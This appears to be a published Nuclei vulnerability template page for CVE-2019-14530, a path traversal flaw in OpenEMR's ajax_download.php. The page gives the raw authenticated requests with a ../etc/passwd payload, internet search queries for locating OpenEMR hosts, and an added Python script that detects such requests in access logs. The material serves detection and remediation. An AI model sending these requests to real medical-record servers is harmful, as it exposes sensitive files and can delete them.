OpenEMR <5.0.2 - Local File Inclusion
ID: CVE-2019-14530
Severity: high
Author: TenBird
Tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr
Description
OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file that is readable by the web server user from server storage. If the requested file is writable by the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from the server.
YAML Source
id: CVE-2019-14530

info:
  name: OpenEMR <5.0.2 - Local File Inclusion
  author: TenBird
  severity: high
  description: |
    OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server.
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data.
  remediation: |
    Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/50037
    - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip
    - https://github.com/openemr/openemr/pull/2592
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14530
    - https://github.com/sec-it/exploit-CVE-2019-14530
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2019-14530
    cwe-id: CWE-22
    epss-score: 0.80535
    epss-percentile: 0.98316
    cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: open-emr
    product: openemr
    shodan-query:
      - http.html:"openemr"
      - http.title:"openemr"
      - http.favicon.hash:1971268439
    fofa-query:
      - icon_hash=1971268439
      - body="openemr"
      - title="openemr"
      - app="openemr"
    google-query: intitle:"openemr"
  tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr

http:
  - raw:
      - |
        POST /interface/main/main_screen.php?auth=login&site=default HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        new_login_session_management=1&authProvider=Default&authUser={{username}}&clearPass={{password}}&languageChoice=1
      - |
        GET /custom/ajax_download.php?fileName=../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - filename=passwd

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a004630440220608979f3f1b471f96dd6fb2ee246ecc5d6441aa38b0e3997383cf096f9a2264602200283cfb0c8c3097eb0018524309ced933607d4d004760e8dabe2844d54e92f65:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-14530.yaml"
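To complement the scan from the log side, the following added example (not part of the template or of OpenEMR) flags access-log requests to custom/ajax_download.php whose fileName value carries traversal sequences, including percent-encoded and double-encoded forms. It assumes combined-format access logs and that legitimate requests pass a bare file name; the sample lines are constructed, and parameters sent in a POST body would not appear in such logs.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed access-log lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /custom/ajax_download.php?fileName=report_2019.xml HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2024:10:02:41 +0000] "GET /custom/ajax_download.php?fileName=../../../../etc/passwd HTTP/1.1" 200 1843
203.0.113.9 - - [12/Mar/2024:10:02:55 +0000] "GET /openemr/custom/ajax_download.php?fileName=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843
198.51.100.4 - - [12/Mar/2024:10:03:10 +0000] "GET /interface/main/main_screen.php?site=default HTTP/1.1" 200 7000
198.51.100.5 - - [12/Mar/2024:10:04:00 +0000] "GET /custom/ajax_download.php?fileName=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded separators become visible."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def classify(file_name):
    """Return why a fileName value is suspicious, or None for a bare file name."""
    name = decode_fully(file_name).replace("\\", "/")
    if ".." in name.split("/"):
        return "traversal"
    if "/" in name:
        return "path-separator"
    return None

def scan(log_text):
    """Return findings for ajax_download.php requests with a suspicious fileName."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not url.path.endswith("/custom/ajax_download.php"):
            continue
        for raw in parse_qs(url.query).get("fileName", []):
            reason = classify(raw)
            if reason:
                # Status 200 means content was probably returned: treat as exposure.
                findings.append({"ip": m["ip"], "time": m["ts"], "reason": reason,
                                 "value": decode_fully(raw), "served": m["status"] == "200"})
    return findings
```

Findings with served set to true warrant reviewing what the web server user could read; given the deletion behaviour described above, also check whether the requested file still exists.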